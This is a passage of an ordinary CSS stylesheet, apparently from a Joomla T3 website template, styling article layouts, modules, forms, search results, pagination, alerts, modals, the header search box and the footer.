  border-top: 0;
  padding-top: 0;
}
.categories-module h4,
ul.categories-module h4,
.category-module h4,
ul.category-module h4,
.categories-module .mod-articles-category-title,
ul.categories-module .mod-articles-category-title,
.category-module .mod-articles-category-title,
ul.category-module .mod-articles-category-title {
  font-size: 14px;
  font-weight: normal;
  margin: 0;
  display: block;
}
.categories-module .mod-articles-category-writtenby,
ul.categories-module .mod-articles-category-writtenby,
.category-module .mod-articles-category-writtenby,
ul.category-module .mod-articles-category-writtenby,
.categories-module .mod-articles-category-date,
ul.categories-module .mod-articles-category-date,
.category-module .mod-articles-category-date,
ul.category-module .mod-articles-category-date {
  color: #666666;
  font-size: 12px;
}
.categories-module .mod-articles-category-writtenby,
ul.categories-module .mod-articles-category-writtenby,
.category-module .mod-articles-category-writtenby,
ul.category-module .mod-articles-category-writtenby {
  font-weight: bold;
  margin-right: 10px;
}
.feed h4 {
  font-weight: bold;
}
.feed .newsfeed,
.feed ul.newsfeed {
  border-top: 1px solid #eeeeee;
}
.feed .newsfeed .feed-link,
.feed ul.newsfeed .feed-link,
.feed .newsfeed h5.feed-link,
.feed ul.newsfeed h5.feed-link {
  font-size: 14px;
  font-weight: normal;
  margin: 0;
}
.latestusers,
ul.latestusers {
  margin-left: 0;
}
.latestusers li,
ul.latestusers li {
  background: #eeeeee;
  display: inline-block;
  padding: 5px 10px;
  border-radius: 0px;
}
.module-ct .whosonline {
  margin-left: 0;
}
.module-ct .whosonline > li {
  display: inline-block;
  border-radius: 0px;
  background: #eeeeee;
  padding: 2px 5px;
  margin: 0 5px 5px 0;
  white-space: nowrap;
}
.stats-module dt,
.stats-module dd {
  display: inline-block;
  margin: 0;
}
.stats-module dt {
  font-weight: bold;
  width: 35%;
}
.stats-module dd {
  width: 60%;
}
.tagspopular ul {
  display: block;
  margin: 0;
  padding: 0;
  list-style: none;
  overflow: hidden;
}
.tagspopular ul > li {
  background: #eeeeee;
  border-radius: 3px;
  color: #666666;
  display: block;
  float: left;
  margin: 0 5px 5px 0;
  padding: 3px 10px;
}
.tagspopular ul > li > a {
  color: #666666;
}
.tagspopular ul > li .tag-count {
  background: transparent;
  color: #666666;
  display: inline;
  margin: 0;
  padding: 0;
}
.tagspopular ul > li:hover {
  background: #454444;
  color: #ffffff;
}
.tagspopular ul > li:hover a {
  color: #ffffff;
  text-decoration: none;
}
.tagspopular ul > li:hover .tag-count {
  color: #ffffff;
}
.tagspopular.tagscloud .tag {
  background: #eeeeee;
  border-radius: 3px;
  display: inline-block;
  margin-bottom: 5px;
  padding: 5px 10px;
}
.tagspopular.tagscloud .tag a {
  color: #666666;
}
.tagspopular.tagscloud .tag a:hover,
.tagspopular.tagscloud .tag a:focus,
.tagspopular.tagscloud .tag a:active {
  color: #1e1e1e;
}
.tagssimilar ul {
  margin: 0;
  padding: 0;
  list-style: none;
}
.tagssimilar ul > li {
  border-bottom: 1px solid #eeeeee;
  padding: 8px 0;
}
.tagssimilar ul > li > a {
  color: #666666;
}
.tagssimilar ul > li > a:hover,
.tagssimilar ul > li > a:focus,
.tagssimilar ul > li > a:active {
  color: #1e1e1e;
}
.module-ct > ul.archive-module {
  list-style: none;
  margin: 0;
  padding: 0;
}
.module-ct > ul.archive-module i {
  color: #999999;
  margin-right: 2px;
}
.module-ct > ul.archive-module li {
  border-bottom: 1px solid #eeeeee;
  padding: 7px 0;
}
.module-ct > ul.archive-module li a {
  color: #666666;
}
.module-ct > ul.archive-module li a:hover,
.module-ct > ul.archive-module li a:focus,
.module-ct > ul.archive-module li a:active {
  color: #454444;
}
.module-ct > ol.breadcrumb {
  padding: 6px 12px;
  margin-left: 0;
}

.item-page {
  margin-bottom: 40px;
}
.items-leading .leading {
  margin-bottom: 40px;
}
.items-row .item {
  margin-bottom: 40px;
}
.divider-vertical {
  margin: 20px 0 40px;
  border: 0;
  border-top: 1px solid #eeeeee;
}
.article-aside {
  color: #999999;
  font-size: 12px;
  margin-bottom: 20px;
  padding: 0;
}
.article-header + .article-aside {
  margin-top: -10px;
}
.item-page .article-aside {
  font-size: 14px;
  margin-bottom: 40px;
}
.article-info {
  margin: 0;
  width: 85%;
}
.article-info .article-info-term {
  display: none;
}
.article-info dd {
  display: inline-block;
  margin-left: 0;
  margin-right: 10px;
  margin-bottom: 5px;
  white-space: nowrap;
}
.article-info dd strong {
  font-weight: 600;
}
.article-info dd .fa {
  margin-right: 5px;
}
.category-name {
  text-transform: capitalize;
}
.category-name .fa {
  display: none;
}
.category-name a {
  background: #454444;
  color: #fff;
  padding: 2px 5px;
}
.category-name a:hover,
.category-name a:focus,
.category-name a:active {
  background: #1e1e1e;
  color: #fff;
  text-decoration: none;
}
.article-footer {
  color: #999999;
  font-size: 12px;
  margin-bottom: 20px;
}
article img,
.article-intro img {
  display: block;
  max-width: 100%;
  height: auto;
}
article img[align=left],
.article-intro img[align=left],
article .img-fulltext-left,
.article-intro .img-fulltext-left,
article .img-intro-left,
.article-intro .img-intro-left,
article .img_caption.left,
.article-intro .img_caption.left,
article .pull-left.item-image,
.article-intro .pull-left.item-image {
  margin-right: 20px;
  max-width: 100%;
}
@media screen and (max-width: 767px) {
  article img[align=left],
  .article-intro img[align=left],
  article .img-fulltext-left,
  .article-intro .img-fulltext-left,
  article .img-intro-left,
  .article-intro .img-intro-left,
  article .img_caption.left,
  .article-intro .img_caption.left,
  article .pull-left.item-image,
  .article-intro .pull-left.item-image {
    margin: 0;
  }
}
article img[align=right],
.article-intro img[align=right],
article .img-fulltext-right,
.article-intro .img-fulltext-right,
article .img_caption.right,
.article-intro .img_caption.right,
article .img-intro-right,
.article-intro .img-intro-right,
article .pull-right.item-image,
.article-intro .pull-right.item-image {
  margin-left: 20px;
  max-width: 100%;
}
@media screen and (max-width: 767px) {
  article img[align=right],
  .article-intro img[align=right],
  article .img-fulltext-right,
  .article-intro .img-fulltext-right,
  article .img_caption.right,
  .article-intro .img_caption.right,
  article .img-intro-right,
  .article-intro .img-intro-right,
  article .pull-right.item-image,
  .article-intro .pull-right.item-image {
    margin: 0;
  }
}
.img-intro-none,
.img-intro-left,
.img-intro-right,
.img-fulltext-none,
.img-fulltext-left,
.img-fulltext-right,
.img_caption {
  position: relative;
  margin-bottom: 20px;
  max-width: 100%;
}
.img-fulltext-left {
  float: left;
}
.img-fulltext-right {
  float: right;
}
.img_caption > img {
  margin-bottom: 1px !important;
}
.img_caption p.img_caption {
  background: #eeeeee;
  color: #666666;
  font-size: 12px;
  width: 100%;
  margin: 0;
  padding: 5px;
  text-align: center;
  clear: both;
}
.pull-right.article-image-intro {
  float: left !important;
  margin-left: 0 !important;
}
.pull-right.article-image-intro img {
  margin-left: 0 !important;
  margin-right: 20px;
}
@media screen and (max-width: 992px) {
  article img,
  .article-intro img,
  article img[align=left],
  .article-intro img[align=left],
  article img[align=right],
  .article-intro img[align=right],
  article .img_caption,
  .article-intro .img_caption,
  article .article-image-full,
  .article-intro .article-image-full,
  article .article-image-intro,
  .article-intro .article-image-intro,
  article .img-intro-none,
  .article-intro .img-intro-none,
  article .img-intro-left,
  .article-intro .img-intro-left,
  article .img-intro-right,
  .article-intro .img-intro-right,
  article .img-fulltext-none,
  .article-intro .img-fulltext-none,
  article .img-fulltext-left,
  .article-intro .img-fulltext-left,
  article .img-fulltext-right,
  .article-intro .img-fulltext-right {
    float: none !important;
    margin-left: 0;
    margin-right: 0;
    width: 100% !important;
  }
}
.item-page .tags {
  border-top: 1px solid #eeeeee;
  padding: 10px 0;
}
.item-page .tags span {
  display: inline-block;
  margin-bottom: 10px;
}
.item-page .tags a {
  background: #ffffff;
  border: 1px solid #eeeeee;
  border-radius: 3px;
  color: #666666;
  padding: 5px;
}
.item-page .tags a:hover,
.item-page .tags a:focus,
.item-page .tags a:active {
  background: #999999;
  border-color: #999999;
  color: #1e1e1e;
}
article aside .btn-group > .dropdown-toggle,
article aside .btn-group > .dropdown-toggle:hover,
article aside .btn-group > .dropdown-toggle:active,
article aside .btn-group > .dropdown-toggle:focus {
  padding: 2px 5px;
}
article aside .btn-group > .dropdown-toggle .caret {
  margin-left: 2px;
}
.tag-category .filters {
  border-bottom: 1px solid #eeeeee;
  padding: 20px 0;
}
@media screen and (min-width: 768px) {
  .tag-category .filters {
    padding: 20px;
  }
}
.tag-category .thumbnails {
  list-style: none;
  margin: 0;
  padding: 0;
}
.tag-category .thumbnails li {
  background: transparent;
  border-bottom: 1px solid #eeeeee;
  padding: 10px 0;
}
.tag-category .thumbnails li > h3 {
  margin-top: 0;
}
.row-even,
.row-odd {
  padding: 5px;
  width: 99%;
  border-bottom: 1px solid #dddddd;
}
.row-odd {
  background-color: transparent;
}
.row-even {
  background-color: #f9f9f9;
}
.blog-row-rule,
.blog-item-rule {
  border: 0;
}
.row-fluid .row-reveal {
  visibility: hidden;
}
.row-fluid:hover .row-reveal {
  visibility: visible;
}
.nav-list > li.offset > a {
  padding-left: 30px;
  font-size: 12px;
}
.list-striped,
.row-striped {
  list-style: none;
  line-height: 20px;
  text-align: left;
  vertical-align: middle;
  border-top: 1px solid #dddddd;
  margin-left: 0;
  padding-left: 0;
}
.list-striped li,
.list-striped dd,
.row-striped .row,
.row-striped .row-fluid {
  border-bottom: 1px solid #dddddd;
  padding: 10px 15px;
}
.list-striped li:nth-child(odd),
.list-striped dd:nth-child(odd),
.row-striped .row:nth-child(odd),
.row-striped .row-fluid:nth-child(odd) {
  background-color: #f9f9f9;
}
.list-striped li:hover,
.list-striped dd:hover,
.row-striped .row:hover,
.row-striped .row-fluid:hover {
  background-color: #f5f5f5;
}
.row-striped .row-fluid {
  width: 97%;
}
.row-striped .row-fluid [class*="span"] {
  min-height: 10px;
}
.row-striped .row-fluid [class*="span"] {
  margin-left: 8px;
}
.row-striped .row-fluid [class*="span"]:first-child {
  margin-left: 0;
}
.list-condensed li {
  padding: 5px 10px;
}
.row-condensed .row,
.row-condensed .row-fluid {
  padding: 5px 10px;
}
.list-bordered,
.row-bordered {
  list-style: none;
  line-height: 18px;
  text-align: left;
  vertical-align: middle;
  margin-left: 0;
  border: 1px solid #dddddd;
}
.login-wrap .other-links ul {
  padding-left: 15px;
}
.form-register fieldset {
  padding: 0 0 10px;
}
.form-register p {
  margin: 0 0 5px;
}
.form-register p.form-des {
  margin: 15px 0;
}
.form-register label {
  display: block;
  float: left;
  font-weight: bold;
  text-align: right;
  width: 130px;
}
.form-register .input,
.form-register .inputbox {
  margin-left: 10px;
  width: 200px;
}
.form-register .btn,
.form-register .button {
  margin-left: 140px;
}
.registration fieldset dt {
  margin-right: 5px;
}
.admintable textarea {
  max-width: 90% !important;
  resize: none;
}
.com_mailto body {
  padding: 10px;
}
.com_mailto .t3-mainbody {
  padding-top: 0;
  padding-bottom: 0;
}
.com_mailto .t3-content {
  width: auto;
}
#mailto-window {
  background: #fff;
  margin: 10px 0 20px;
  padding: 0;
  position: relative;
}
#mailto-window h2 {
  margin-top: 0;
  margin-bottom: 20px;
}
#mailtoForm .formelm {
  padding: 5px 0;
  vertical-align: middle;
  overflow: hidden;
}
#mailtoForm .formelm label {
  display: inline-block;
  float: left;
  font-weight: bold;
  vertical-align: middle;
  width: 100px;
}
#mailtoForm p {
  margin-top: 20px;
}
#mailtoForm .input,
#mailtoForm .inputbox {
  width: 65%;
}
#mailtoForm .btn,
#mailtoForm .button,
#mailtoForm button {
  margin-right: 5px;
}
.user-details {
  padding: 10px 0;
}
.user-details p {
  margin: 0 0 5px;
}
.user-details label {
  display: block;
  float: left;
  font-weight: bold;
  text-align: right;
  width: 130px;
}
.user-details .input,
.user-details .inputbox {
  margin-left: 10px;
  width: 200px;
}
.user-details .btn,
.user-details button {
  margin-left: 140px;
}
.user-details .paramlist .paramlist_key {
  padding: 0 0 5px;
  width: 130px;
}
.user-details .paramlist .paramlist_value {
  padding: 0 0 5px;
}
.user-details .user_name span {
  font-weight: bold;
  padding-left: 10px;
}
.reset .form-validate p,
.remind .form-validate p {
  background: #eeeeee;
  border: 1px solid #eeeeee;
  margin-bottom: 20px;
  padding: 10px 20px;
  border-radius: 0px;
}
.reset .form-validate fieldset dl,
.remind .form-validate fieldset dl {
  margin: 0;
}
.reset .form-validate fieldset dt,
.remind .form-validate fieldset dt {
  margin: 4px 0 0 0;
}
.profile-edit input {
  position: relative;
  min-height: 1px;
  padding-left: 6px;
  padding-right: 6px;
}
@media (min-width: 768px) {
  .profile-edit input {
    float: left;
    width: 50%;
  }
}
.profile-edit select {
  position: relative;
  min-height: 1px;
  padding-left: 6px;
  padding-right: 6px;
}
@media (min-width: 768px) {
  .profile-edit select {
    float: left;
    width: 50%;
  }
}
.profile-edit select + button {
  margin-left: 5px;
}
#searchForm:before,
#searchForm:after {
  content: " ";
  display: table;
}
#searchForm:after {
  clear: both;
}
#searchForm fieldset {
  margin: 20px 0;
}
#searchForm legend {
  margin-bottom: 10px;
}
#searchForm select {
  width: auto;
  display: inline-block;
  margin-left: 5px;
  padding-left: 5px;
}
#searchForm .form-limit {
  margin-top: 20px;
}
#searchForm .form-limit .counter {
  margin-top: 0;
  border: none;
  font-size: 14px;
  font-weight: bold;
  color: #0077bb;
}
@media screen and (max-width: 768px) {
  #searchForm .radio-inline,
  #searchForm .checkbox-inline {
    display: block;
    width: 100%;
    margin-left: 0;
  }
}
.search-results {
  margin-top: 20px;
}
.search-results .result-title {
  font-size: 16px;
  font-weight: bold;
  margin-top: 20px;
}
.search-results .result-category {
  font-size: 12px;
  color: #999999;
}
.search-results .result-text {
  margin-top: 5px;
  margin-bottom: 5px;
}
.search-results .result-url {
  color: #666666;
  margin-top: 20px;
}
.search-results .result-created {
  font-size: 12px;
  color: #999999;
}
div.finder {
  margin-bottom: 20px;
}
.filter-branch:after {
  content: "";
  clear: both;
  display: table;
}
.filter-branch .finder-selects {
  margin-right: 20px;
  margin-bottom: 20px;
}
.filter-branch .finder-selects .control-label {
  margin-bottom: 10px;
}
.contact .contact-form .checkbox input#jform_contact_email_copy {
  margin-left: 0;
}
.contact .accordion-heading .accordion-toggle {
  font-weight: bold;
}
#archive-items > li {
  line-height: normal;
  margin: 0;
  overflow: visible;
  padding: 0;
}
#archive-items .intro {
  clear: both;
  overflow: hidden;
}
.categories-list {
  margin-bottom: 20px;
}
.category-item:before,
.category-item:after {
  content: " ";
  display: table;
}
.category-item:after {
  clear: both;
}
.category-item .page-header {
  line-height: normal;
  padding: 10px 5px;
  margin: 0;
  font-size: 18px;
  font-weight: normal;
}
.category-item .category-item {
  margin-bottom: 0;
  margin-left: 30px;
}
.category-item .category-item .page-header {
  font-size: 14px;
}
.cat-children .page-header {
  line-height: normal;
  padding: 10px 5px;
  margin: 0;
  font-size: 18px;
  font-weight: normal;
}
.newsfeed-category > h2,
.newsfeed > h2 {
  border-bottom: 1px solid #eeeeee;
  padding-bottom: 20px;
  margin-bottom: 20px;
  margin-top: 0;
}
.newsfeed-category .category-desc,
.newsfeed .category-desc {
  margin-bottom: 20px;
}
.newsfeed-category .category li:before,
.newsfeed .category li:before,
.newsfeed-category .category li:after,
.newsfeed .category li:after {
  content: " ";
  display: table;
}
.newsfeed-category .category li:after,
.newsfeed .category li:after {
  clear: both;
}
.newsfeed > h2 {
  border-bottom: 1px solid #eeeeee;
  padding-bottom: 20px;
  margin-bottom: 20px;
  margin-top: 0;
}
.newsfeed .feed-description {
  margin-bottom: 20px;
  font-size: 16px;
}
.newsfeed .feed-item-description .feed-description {
  font-size: 14px;
}
.newsfeed ol li > a {
  font-weight: bold;
  font-size: 16px;
}
.article-content .pagination ul {
  border-left: 1px solid #eeeeee;
}
.article-content .pagination li {
  float: left;
  padding: 10px 20px;
  line-height: normal;
  border: 1px solid #eeeeee;
  border-left: 0;
}
.article-content .pagination li a {
  border: 0;
  text-decoration: none;
  background-color: transparent;
  line-height: normal;
  padding: 0;
}
.pagenavcounter {
  margin: 0 0 20px;
  font-weight: bold;
}
#article-index,
.article-index {
  margin: 0 0 20px 20px;
  padding: 10px;
  width: 25%;
  border: 1px solid #eeeeee;
  border-radius: 0px;
}
#article-index ul,
.article-index ul {
  margin: 0;
  padding: 0;
  border: 0;
}
#article-index ul > li,
.article-index ul > li {
  border: 0;
  margin-top: 2px;
}
#article-index ul > li > a,
.article-index ul > li > a {
  border: 0;
  padding: 5px;
  border-radius: 0px;
}
#article-index ul > .active > a,
.article-index ul > .active > a {
  border: 0;
  background: #454444;
  color: #ffffff;
}
#article-index ul > .active > a:hover,
.article-index ul > .active > a:hover,
#article-index ul > .active > a:active,
.article-index ul > .active > a:active,
#article-index ul > .active > a:focus,
.article-index ul > .active > a:focus {
  border: 0;
  background: #454444;
  color: #ffffff;
}
.pagenav {
  margin: 0;
  padding: 0;
  list-style: none;
}
.pagenav > li {
  margin: 0;
  padding: 0;
  float: left;
}
.pagenav > li.pagenav-prev,
.pagenav > li.previous {
  margin-right: 10px;
}
.pagenav li > a {
  padding: 10px 20px;
  line-height: normal;
  border: 1px solid #dddddd;
  border-radius: 0px;
}
.pagenav li > a:hover,
.pagenav li > a:active,
.pagenav li > a:focus {
  background-color: #eeeeee;
}
.items-more h3 {
  margin: 0 0 20px;
}
.items-more .nav > li {
  border-top: 1px solid #eeeeee;
}
.items-more .nav > li > a {
  padding: 6px 5px;
}
.back_button a {
  display: block;
  margin: 10px 0;
}
.filters {
  margin: 10px 0 5px;
}
.display-limit {
  margin: 10px 0 5px;
}
.filters .display-limit {
  float: right;
  text-align: right;
}
#system-message dt {
  font-weight: bold;
}
#system-message dd {
  font-weight: bold;
}
#system-message dd.message ul,
#system-message dd.error ul,
#system-message dd.notice ul {
  margin: 0;
  padding: 0;
}
#system-message dd.message ul li,
#system-message dd.error ul li,
#system-message dd.notice ul li {
  background: none;
  margin: 0;
  padding: 5px;
}
.alert-message {
  background-color: #dff0d8;
  border-color: #d6e9c6;
  color: #468847;
}
.alert-message hr {
  border-top-color: #c9e2b3;
}
.alert-message .alert-link {
  color: #356635;
}
.alert-notice {
  background-color: #d9edf7;
  border-color: #bce8f1;
  color: #3a87ad;
}
.alert-notice hr {
  border-top-color: #a6e1ec;
}
.alert-notice .alert-link {
  color: #2d6987;
}
.alert-error {
  background-color: #f2dede;
  border-color: #ebccd1;
  color: #b94a48;
}
.alert-error hr {
  border-top-color: #e4b9c0;
}
.alert-error .alert-link {
  color: #953b39;
}
.alert-error .alert-message {
  background: transparent;
  color: inherit;
}
.tip-wrap {
  background: #fff6df;
  border: 1px solid #fb3;
  border-radius: 5px;
  -webkit-box-shadow: none;
  box-shadow: none;
  max-width: 300px;
  z-index: 999;
}
.tip-title {
  border-bottom: 1px solid #fb3;
  font-weight: bold;
  padding: 5px 10px;
}
.tip-text {
  font-size: 14px;
  margin: 0;
  padding: 5px 10px;
}
.hasTip img {
  border: none;
  margin: 0 5px 0 0;
}
@media (min-width: 768px) {
  .languageswitcherload {
    float: right;
    width: 100%;
  }
  .languageswitcherload .mod-languages {
    text-align: right;
  }
}
div.calendar {
  width: 187px;
}
dl.tabs {
  border-bottom: 1px solid #d9d9d9;
  display: block;
  clear: both;
  margin-bottom: 0;
}
dl.tabs:before,
dl.tabs:after {
  content: " ";
  display: table;
}
dl.tabs:after {
  clear: both;
}
dl.tabs dt.tabs {
  border: 1px solid #d9d9d9;
  display: inline-block;
  padding: 10px 20px;
  margin-right: 5px;
  margin-bottom: -1px;
}
dl.tabs dt.tabs h3 {
  margin: 0;
  font-size: 14px;
}
dl.tabs dt.tabs h3 a {
  color: #444444;
  outline: none;
}
dl.tabs dt.tabs h3 a:hover,
dl.tabs dt.tabs h3 a:focus,
dl.tabs dt.tabs h3 a:active {
  color: #1e1e1e;
  text-decoration: none;
}
dl.tabs dt.tabs.open {
  border-bottom-color: #ffffff;
}
dl.tabs dt.tabs.open a {
  font-weight: bold;
}
.iframe-bordered {
  border: 1px solid #dddddd;
}
.chzn-container {
  display: inline-block;
  vertical-align: middle;
}
.chzn-container-single .chzn-single,
.chzn-container-multi .chzn-choices .search-field input,
.chzn-container-single .chzn-search input {
  height: 26px;
}
.chzn-container-single .chzn-drop,
.chzn-container .chzn-drop {
  -webkit-box-sizing: content-box !important;
  -moz-box-sizing: content-box !important;
  box-sizing: content-box !important;
}
.input-prepend .chzn-container-single .chzn-single {
  border-color: #cccccc;
  height: 26px;
  border-radius: 0 3px 3px 0;
  -webkit-box-shadow: none;
  box-shadow: none;
}
.input-prepend .chzn-container-active .chzn-single-with-drop {
  border-radius: 0 3px 0 0;
}
.input-prepend .chzn-container-single .chzn-drop {
  border-color: #cccccc;
}
.btn-group .chzn-results {
  white-space: normal;
}

.page-header {
  padding-bottom: 20px;
  margin: 0 0 20px;
  border-bottom: 1px solid #eeeeee;
}
.page-title,
.page-header h1 {
  line-height: 1;
  margin: 0;
}
.page-subheader {
  border-bottom: 1px solid #eeeeee;
  margin: 0 0 20px;
  padding-bottom: 20px;
}
.page-subheader:before,
.page-subheader:after {
  content: " ";
  display: table;
}
.page-subheader:after {
  clear: both;
}
.page-subtitle,
.page-subheader h2 {
  line-height: 1;
  margin: 0;
}
.page-header + .page-subheader {
  margin-top: -20px;
}
.article-title h1 a:hover,
.article-header h1 a:hover,
.article-title h2 a:hover,
.article-header h2 a:hover,
.article-title h1 a:active,
.article-header h1 a:active,
.article-title h2 a:active,
.article-header h2 a:active,
.article-title h1 a:focus,
.article-header h1 a:focus,
.article-title h2 a:focus,
.article-header h2 a:focus {
  text-decoration: none;
}
.article-title,
.article-header h1 {
  margin: 0 0 20px 0;
}
@media screen and (max-width: 767px) {
  .article-title,
  .article-header h1 {
    font-size: 24px;
  }
}
@media screen and (max-width: 767px) {
  h2.article-title,
  .article-header h2 {
    font-size: 24px;
  }
}
.item-title {
  font-weight: bold;
}
.jumbotron:before,
.jumbotron:after {
  content: " ";
  display: table;
}
.jumbotron:after {
  clear: both;
}
.jumbotron h1,
.jumbotron h2,
.jumbotron h3 {
  margin-top: 0;
}
.jumbotron p {
  color: #666666;
}
.jumbotron p:last-child {
  margin-bottom: 0;
}
.container .jumbotron {
  border-radius: 0px;
}
.jumbotron .btn {
  margin-top: 20px;
  margin-bottom: 20px;
}
.masthead {
  padding-top: 40px;
  padding-bottom: 40px;
  text-align: center;
}
.masthead p:last-child {
  margin-bottom: 0;
}
@media screen and (min-width: 992px) {
  .masthead {
    padding-top: 80px;
    padding-bottom: 80px;
  }
  .masthead h1 {
    font-size: 84px;
  }
  .masthead p {
    font-size: 28px;
  }
  .masthead .btn-lg {
    padding: 15px 40px;
    font-size: 24px;
  }
}
.jumbotron-primary {
  background-color: #454444;
}
.jumbotron-primary h1,
.jumbotron-primary h2,
.jumbotron-primary h3 {
  color: #ffffff;
}
.jumbotron-primary p {
  color: #c4c4c4;
}
.jumbotron-primary .btn-primary {
  border-color: #fff;
}
.page-masthead:before,
.page-masthead:after {
  content: " ";
  display: table;
}
.page-masthead:after {
  clear: both;
}
.page-masthead .jumbotron {
  margin-top: 0 !important;
  margin-bottom: 0 !important;
  padding-top: 60px;
  padding-bottom: 60px;
  padding-left: 0;
  padding-right: 0;
}
@media screen and (max-width: 992px) {
  .page-masthead .jumbotron {
    padding-top: 40px;
    padding-bottom: 40px;
  }
  .page-masthead .jumbotron .container {
    padding: 0;
  }
}
@media screen and (max-width: 767px) {
  .page-masthead .jumbotron {
    padding-left: 20px;
  }
}
.label {
  border-radius: 0px;
}
.label:empty {
  display: none;
}
.badge:empty {
  display: none;
}
.btn .badge {
  position: relative;
  top: -1px;
}
.page-header .label,
.page-header .badge {
  vertical-align: middle;
}
.thumbnail {
  padding: 0;
  margin-bottom: 40px;
}
.alert h4 {
  color: inherit;
}
.media:first-child {
  margin-top: 0;
}
.media-object {
  display: block;
}
.media-heading {
  margin: 0 0 5px;
}
.media > .pull-left {
  margin-right: 10px;
}
.media > .pull-right {
  margin-left: 10px;
}
.list-group-item > .badge {
  float: right;
}
.list-group-item > .badge + .badge {
  margin-right: 5px;
}
a.list-group-item.active .list-group-item-heading,
a.list-group-item.active:hover .list-group-item-heading,
a.list-group-item.active:focus .list-group-item-heading {
  color: inherit;
}
a.list-group-item.active .list-group-item-text,
a.list-group-item.active:hover .list-group-item-text,
a.list-group-item.active:focus .list-group-item-text {
  color: #abaaaa;
}
.panel-heading > .dropdown .dropdown-toggle {
  color: inherit;
}
.panel-title > a {
  color: inherit;
}
.modal-backdrop.fade {
  opacity: 0;
  filter: alpha(opacity=0);
}
.modal-backdrop.in {
  opacity: 0.5;
  filter: alpha(opacity=50);
}
.modal-header {
  border-bottom: 0;
  padding: 20px 40px 0;
}
.modal-title {
  font-size: 35px;
}
.modal-body {
  padding: 10px 40px 20px;
}
@media screen and (min-width: 768px) {
  .modal-dialog {
    width: 600px;
    margin: 30px auto;
  }
  .modal-content {
    -webkit-box-shadow: 0 5px 15px rgba(0, 0, 0, 0.5);
    box-shadow: 0 5px 15px rgba(0, 0, 0, 0.5);
  }
}

.logo {
  position: absolute;
  top: 0;
  left: 0;
  padding: 0;
  margin: 0;
}
.logo a {
  background: transparent;
  color: #fff;
  text-decoration: none;
  display: inline-block;
  line-height: 1;
  margin: 0;
}
.logo:hover a,
.logo a:hover,
.logo a:active,
.logo a:focus {
  background: #383737;
  color: #ffffff;
  text-decoration: none;
}
@media screen and (min-width: 991px) {
  .logo {
    position: static;
  }
  .logo a {
    background: #383737;
  }
  .logo:hover a,
  .logo a:hover,
  .logo a:active,
  .logo a:focus {
    color: #ffffff;
  }
}
.off-canvas-toggle + .container .navbar-header .logo {
  left: 55px;
  border-left: 1px solid #383737;
}
@media screen and (min-width: 991px) {
  .off-canvas-toggle + .container .navbar-header .logo {
    border-left: 0;
  }
}
.logo-image > a {
  max-width: 160px;
  max-height: 55px;
}
.logo-image > a > img {
  max-width: 100%;
}
.logo-image span,
.logo-image small {
  display: none;
}
.logo-text {
  text-transform: uppercase;
  font-size: 18px;
}
.logo-text a {
  line-height: 55px;
  padding: 0 20px;
}
.logo-text .site-slogan {
  display: none;
}
.head-search {
  height: 55px;
  position: absolute;
  right: 0;
  margin: 0;
  z-index: 1000;
}
.head-search form {
  margin: 0;
}
.head-search label {
  display: none;
}
.head-search .search {
  background: #454444;
  border-left: 1px solid #383737;
  border-right: 1px solid #383737;
  position: relative;
}
@media screen and (min-width: 991px) {
  .head-search .search {
    background: #383737;
  }
}
.head-search .search .fa-search {
  color: #c4c4c4;
  content: "\f002";
  display: block;
  font-family: "FontAwesome";
  position: absolute;
  left: 20px;
  top: 19px;
  z-index: 1;
}
.head-search .search .fa-search:hover {
  z-index: 0;
}
.head-search .form-control {
  border: 0;
  background: transparent;
  color: #c4c4c4;
  height: 54px;
  line-height: 35px;
  position: relative;
  margin: 0;
  padding: 10px 15px 10px 40px;
  width: 0;
  -webkit-transition: width 0.2s;
  -o-transition: width 0.2s;
  transition: width 0.2s;
}
@media screen and (min-width: 991px) {
  .head-search .form-control {
    height: 55px;
  }
}
.head-search .form-control:hover,
.head-search .form-control:active,
.head-search .form-control:focus {
  color: #ffffff;
  box-shadow: none;
}
.head-search .form-control:active,
.head-search .form-control:focus {
  width: 180px;
}
.head-search .form-control:-webkit-autofill {
  -webkit-box-shadow: 0 0 0 1000px #0067a2 inset;
  -webkit-text-fill-color: #ffffff;
}
.head-search .form-control::-moz-placeholder {
  color: #ffffff;
}
.navbar-toggle + .head-search {
  right: 55px;
  max-width: 57px;
}
@media screen and (max-width: 990px) {
  .navbar-toggle + .head-search {
    max-width: inherit;
  }
  .navbar-toggle + .head-search:hover,
  .navbar-toggle + .head-search:focus,
  .navbar-toggle + .head-search:active {
    max-width: none;
  }
  .navbar-toggle + .head-search:hover .form-control,
  .navbar-toggle + .head-search:focus .form-control,
  .navbar-toggle + .head-search:active .form-control {
    width: 180px;
  }
}
@media screen and (min-width: 991px) {
  .head-search,
  .navbar-toggle + .head-search {
    right: 15px;
    top: 0;
    max-width: none;
  }
}
.nav .open > a,
.nav .open > a:hover,
.nav .open > a:focus {
  color: #ffffff;
  background: transparent;
}
.chzn-container-multi .chzn-choices li.search-field input[type="text"] {
  height: 30px;
}
.chzn-container {
  max-width: 100%;
}
.chzn-container .chzn-single {
  max-width: 260px;
}
.ie8 .radio.t3onoff {
  border: 0;
}
.ie8 label.on,
.ie8 label.off {
  border: 1px solid #eeeeee;
}
.pagination > li > a,
.pagination > li > span {
  margin-bottom: 10px;
}
#eblog-wrapper {
  line-height: 1.625;
}
.com_weblinks .weblink-categories .page-header.item-title .btn {
  padding: 5px;
}
.com_weblinks .weblink-categories .page-header.item-title .btn .fa-minus {
  display: block;
}
.com_weblinks .weblink-categories .page-header.item-title .btn .fa-plus {
  display: none;
}
.com_weblinks .weblink-categories .page-header.item-title .btn.collapsed .fa-minus {
  display: none;
}
.com_weblinks .weblink-categories .page-header.item-title .btn.collapsed .fa-plus {
  display: block;
}
.t3-sl {
  padding-bottom: 40px;
  padding-top: 40px;
}
.t3-sl .t3-module {
  margin-bottom: 0;
}
.t3-sl .t3-module + .t3-module {
  margin-top: 20px;
}
@media screen and (min-width: 768px) {
  .t3-sl {
    padding-bottom: 60px;
    padding-top: 60px;
  }
}
.t3-sl-1 {
  border-bottom: 1px solid #eeeeee;
}
.t3-mainbody {
  padding-top: 20px;
  padding-bottom: 20px;
}
.t3-content {
  padding-top: 20px;
  padding-bottom: 20px;
}
.t3-sidebar {
  padding-top: 20px;
  padding-bottom: 20px;
}
.t3-footer {
  background: #f7f7f7;
  color: #666666;
}
.t3-footer:before,
.t3-footer:after {
  content: " ";
  display: table;
}
.t3-footer:after {
  clear: both;
}
.t3-footer small {
  display: block;
  font-size: 100%;
}
.t3-footer-sl {
  padding: 20px 0;
}
.t3-footer-sl:before,
.t3-footer-sl:after {
  content: " ";
  display: table;
}
.t3-footer-sl:after {
  clear: both;
